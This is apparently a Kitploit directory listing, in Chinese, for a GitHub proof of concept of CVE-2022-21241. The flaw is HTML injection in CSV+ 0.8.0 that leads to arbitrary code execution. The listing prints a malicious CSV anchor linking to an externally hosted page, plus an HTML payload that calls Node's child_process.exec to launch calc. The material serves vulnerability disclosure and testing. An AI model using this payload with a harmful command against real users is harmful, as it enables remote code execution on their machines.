Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nanaao/csv-plus_vulnerability
Payload生成漏洞分析代码分析漏洞利用Web应用程序漏洞利用学习与教育
GitHubnanaao/csv-plus_vulnerability

csv-plus_vulnerability

👻 [PoC] CSV+ 0.8.0 - 任意代码执行 (CVE-2022-21241)

查看仓库
524年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

csv-plus_vulnerability

👻 两次点击即可触发任意代码执行漏洞。

PoC.gif

CVE-2022-21241

⚠
此 PoC 旨在提醒用户并帮助排查其自身 CSV+ 中的漏洞,禁止用于攻击行为。

漏洞

以下版本受影响。

  • CSV+ <= 0.8.0

攻击者可利用 Node.js 功能执行任意代码。 他们会在某个网站上放置恶意 js 代码,并借助 CSV+ 中的 HTML 注入漏洞,通过 a 标签链接到该代码。

PoC

scenario.png

恶意 csv 文件

root@kitploit:~
<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>

https://electronooooo.htmlbin.net/xsscalc.html 是一个临时链接。

恶意 html 文件(calc)

root@kitploit:~
<!DOCTYPE html>
<html>
    <head>
        <script>
            var cmd = "calc";
            require("child_process").exec(cmd);
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>
下载工具